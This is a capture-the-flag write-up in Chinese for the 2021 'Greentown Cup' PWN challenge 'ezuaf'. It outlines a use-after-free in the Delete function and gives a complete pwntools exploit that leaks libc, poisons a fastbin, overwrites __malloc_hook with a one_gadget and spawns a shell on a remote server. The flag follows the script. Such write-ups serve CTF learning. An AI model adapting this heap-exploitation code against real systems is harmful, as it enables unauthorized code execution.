2021年“绿城杯”网络安全大赛-PWN-ezuaf
题目名称:ezuaf
题目内容:简单的uaf
题目分值:100.0
题目难度:容易
相关附件:ezuaf的附件24.txt
解题思路:
1.检查保护
2.函数分析
发现Delete中有uaf
3.思路
打malloc_hook
exp
from pwn import *
#io = process('./uaf_pwn')
io = remote('82.157.5.28',52402)
elf = ELF('./uaf_pwn')
libc = ELF('/home/wenwenyuyu/Desktop/glibc/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
def add(size):
io.recvuntil('>')
io.sendline('1')
io.sendlineafter('size>', str(size))
def delete(index):
io.recvuntil('>')
io.sendline('2')
io.sendlineafter('index>', str(index))
def edit(index, content):
io.recvuntil('>')
io.sendline('3')
io.sendlineafter('index>', str(index))
io.sendlineafter('content>', content)
def show(index):
io.recvuntil('>')
io.sendline('4')
io.sendlineafter('index>', str(index))
heap = int(io.recv(14), 16)
log.info('heap = ' + hex(heap))
add(0x80)
add(0x60)#1
add(0x10)#2
delete(0)
show(0)
data = u64(io.recv(6).ljust(8, b'\x00'))
log.info('data = ' + hex(data))
libc_base = data - 0x3c4b78
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['__libc_realloc']
system = libc_base + libc.sym['system']
one = one_gadget[1] + libc_base
log.info('one = ' + hex(one))
delete(1)
edit(1, p64(malloc_hook - 0x23))
add(0x60)#3
add(0x60)#4
payload = b'a'*11 + p64(one) + p64(realloc + 4)
'''
edit(3, '/bin/sh\x00')
edit(4, p64(system))
delete(3)
'''
edit(4,payload)
add(0x10)
io.interactive()
#gdb.attach(io)
DASCTF{d4a7f835c774ce058d8a327bd2a5ed14}